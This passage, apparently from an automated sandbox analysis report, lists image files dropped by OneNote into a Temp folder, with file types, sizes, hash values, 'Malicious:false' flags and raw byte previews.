                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{029FBFD0-B61D-4F5F-ACCD-009DEDCA62D2}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40035
                                                                                                                                                                                                                  Entropy (8bit):7.360144465307449
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
                                                                                                                                                                                                                  MD5:B1DDD365D87605F96D72042CB56572F6
                                                                                                                                                                                                                  SHA1:ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
                                                                                                                                                                                                                  SHA-256:06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
                                                                                                                                                                                                                  SHA-512:9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R*.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$.*.r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<|..1/.|.....b..-..y....]U#Ctn.7m.._.|..2I;|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{02DC9B69-A53A-46D1-8EBD-7C2B3E74598B}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13737
                                                                                                                                                                                                                  Entropy (8bit):7.916899917415529
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                                  MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                                  SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                                  SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                                  SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{031C1558-38FE-4A59-A10F-453065FF0CA3}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{040A4241-326B-4C18-8B0D-66961D04C831}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):15740
                                                                                                                                                                                                                  Entropy (8bit):6.0674556182683945
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                                                                                                                                  MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                                                                                                                                  SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                                                                                                                                  SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                                                                                                                                  SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{041726F2-F83F-494C-B2B8-A775DD9A3C1A}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{04594D6A-6657-46E0-A89B-CD7EB7A030AB}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2599
                                                                                                                                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{04C34D9D-2C4C-419E-8D67-29C53AE2AFED}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.943341403425058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                                  MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                                  SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                                  SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                                  SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{05DF36A6-4010-4DB9-879A-122704E49427}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):59832
                                                                                                                                                                                                                  Entropy (8bit):7.308211468398169
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
                                                                                                                                                                                                                  MD5:DCDD543A4E0BA2C1909BA095D46FFBCB
                                                                                                                                                                                                                  SHA1:B86C89537138FE07255354202D3EAD0B53B3C54D
                                                                                                                                                                                                                  SHA-256:28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
                                                                                                                                                                                                                  SHA-512:5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{06358D16-FD3C-40E9-AD49-F615A7A9F1A7}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{08431D37-3FCA-4CDE-8BAA-B966BC3A255C}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{0A5C9AA1-1AF2-4C0B-8485-9509DF545D8E}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):84941
                                                                                                                                                                                                                  Entropy (8bit):7.966881945560921
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:X3sWfhTVd+xu6rA6SOONM0/YFXnviDwoPCaNSm+z/ze/fWNj7GfigeKyCGzw+QKW:nsOhdDJOwY1voPCaom+z/zeHAfGihCG8
                                                                                                                                                                                                                  MD5:CB84C108A76C2AFFCAC2551A3C1EAD56
                                                                                                                                                                                                                  SHA1:8BB7C2A12B056C1ED12EBBAE5BC9F60CCE880FFE
                                                                                                                                                                                                                  SHA-256:139BB0E79F89C3DDEF79B1716A5FBAB4C07DF5785FB3CDF6B4EEDDBF6C078452
                                                                                                                                                                                                                  SHA-512:6EF85144E9A7ACD0FF2E52A5FF42093153EFB69127B1C8549EEBC49B6CC196A46B65EE39A2CAD0206F6A41476D8B5B35D29EAC9942B8F84972B32E14CAFEED27
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d....................................................................................!.1A.Qa..q...........".2..BRbr#.T.3C....S$.cs.D..4%5......................!1A..Qaq."2..BR....3...b#.r.C4.............?.......m.q..'O.....r......_.1....8h....?.....O]~..k......GO...''._...!....o........''..g..H?k.......1...?.....z......>...+0..................GO...''._.........}.O.Z|.L?...........?.........[~t.......}......NO.....v.......J.......?..g..H?k......GO,m..r}o.z.....}......dC.9?..g..H_..........?.....O]~...m...C?.z..f....W.=u.B..m..C.-?.a.....3._.?.......o....np.M....g..H_............9?..g..H...../..kO...''._...!~...o.....0.M....g..H.........../......O]~.~...o.......7..+.... ..l?.}........&....3._./....?.........W.=u.C..m..C.+?..o.W.=u.A.^.O....:......_.........}..t

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{0AC9C610-A83C-45B6-8E69-BA771C718D5F}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
